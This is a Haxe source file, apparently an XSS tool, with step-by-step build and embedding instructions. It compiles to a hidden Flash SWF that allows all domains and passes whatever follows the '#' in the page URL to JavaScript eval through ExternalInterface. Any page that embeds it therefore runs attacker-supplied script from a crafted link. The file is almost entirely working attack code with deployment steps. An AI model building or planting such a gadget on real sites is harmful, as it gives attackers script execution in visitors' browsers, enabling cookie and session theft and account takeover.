// xss.hx
//
// Purpose:
//    This haxe source file builds a SWF which injects JavaScript into the including page.
//
// To build:
//   1. Acquire the latest stable version of haxe from http://haxe.org/download
//      Note: To run haxe, you may also need Neko (http://nekovm.org/download)
//   2. Create a file called xss.hx with these contents.
//   3. Create a file called compile.hxml with the following content:
//      -swf-version 9
//      -swf xss.swf
//      -main xss 
//   4. From the command line, execute:
//      haxe compile.hxml
//
// To activate:
//   1. Take xss.swf generated by haxe and deploy it to your webserver.
//   2. Embed it into your HTML file with code like the following:
//      <object
//          id="xss" class="hidden"
//          classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
//          codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
//          <param name="movie" value="xss.swf" />
//          <param name="allowScriptAccess" value="always" />
//          <embed
//              class="hidden"
//              src="xss.swf"
//              allowScriptAccess="always"
//              type="application/x-shockwave-flash"
//              pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"> 
//          </embed>
//      </object>
//

import flash.external.ExternalInterface;

class Xss {

    public static function main() {
        flash.system.Security.allowDomain("*");
        ExternalInterface.call( [ "(function(){setTimeout(\"",
            "eval(document.location.hash.slice(1))",
        "\",0);})" ].join('') );
    }
    
}